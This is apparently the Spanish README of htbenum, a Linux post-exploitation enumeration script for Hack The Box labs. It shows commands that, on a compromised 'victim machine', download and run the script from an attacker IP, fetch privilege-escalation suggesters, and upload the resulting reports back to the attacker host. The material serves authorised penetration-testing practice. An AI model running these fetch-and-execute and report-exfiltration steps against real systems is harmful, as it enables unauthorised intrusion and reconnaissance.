
Un script de enumeración para Linux para Hack The Box
Un script de enumeración para Linux para Hack The Box
Este script está diseñado para usarse en situaciones donde no tienes acceso a internet en un host Linux y deseas ejecutar scripts de enumeración y sugerencia de exploits, como en Hack The Box. A menudo me encuentro ejecutando un conjunto similar de scripts cuando consigo un punto de apoyo inicial en una máquina Linux, y este script ayuda a automatizar el proceso de descargar la última versión de cada script de enumeración, hacerlo ejecutable y ejecutarlo, además de enviar la salida a un archivo para revisión posterior. También incluye un servidor web integrado para alojar las herramientas y subir informes de vuelta a la máquina host.
¡Pull requests/sugerencias bienvenidos!

./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]
Example:
Host machine: root@kali:~/htbenum# ./htbenum.sh -u
Host machine: root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
Victim machine: www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
Victim machine: www-data@victim:/tmp$ chmod +x ./htbenum.sh
Victim machine: www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
Parameters:
-h - View help and usage.
-i IP - IP address of the listening web server used for upload and download.
-p port - TCP port of the listening web server used for upload and download.
-o directory - Custom download and report creation directory (default is /tmp).
-w - Start builtin web server for downloading files and uploading reports.
-u - Update to the latest versions of each tool, overwriting any existing versions.
-r - Upload reports back to the host machine web server (must support PUT requests).
Para usar htbenum, clona el repositorio y ejecuta el script con el parámetro update en tu máquina local. Esto descargará y actualizará todos los scripts necesarios desde internet (Github) y los colocará en el mismo directorio que htbenum.sh:
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum# ./htbenum.sh -u
_ _ ___________ _____ _ _ _ ____ ___
| | | |_ _| ___ \ ___| \ | | | | | \/ |
| |_| | | | | |_/ / |__ | \| | | | | . . |
| _ | | | | ___ \ __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\ | |_| | | | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_| |_/
By Solomon Sklash - [email protected]
[i] Updating all tools...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Update complete!
root@kali:~/htbenum#
Luego, inicia el servidor web integrado para alojar las herramientas y recibir los informes completados. El servidor requiere Python 3. Puedes usar tu propio servidor web para alojar las herramientas, pero deberá soportar solicitudes PUT para la subida de informes.
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
Finalmente, sube el script htbenum.sh a tu máquina objetivo, hazlo ejecutable y ejecútalo con la IP y el puerto de tu máquina host, con un directorio opcional para descargar archivos y escribir la salida del informe. También puedes opcionalmente subir los informes de vuelta a la máquina host. Por ejemplo:
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r
Cada herramienta enviará su salida a un archivo de informe en el mismo directorio que el script htbenum.sh, o en el directorio especificado por el parámetro -d.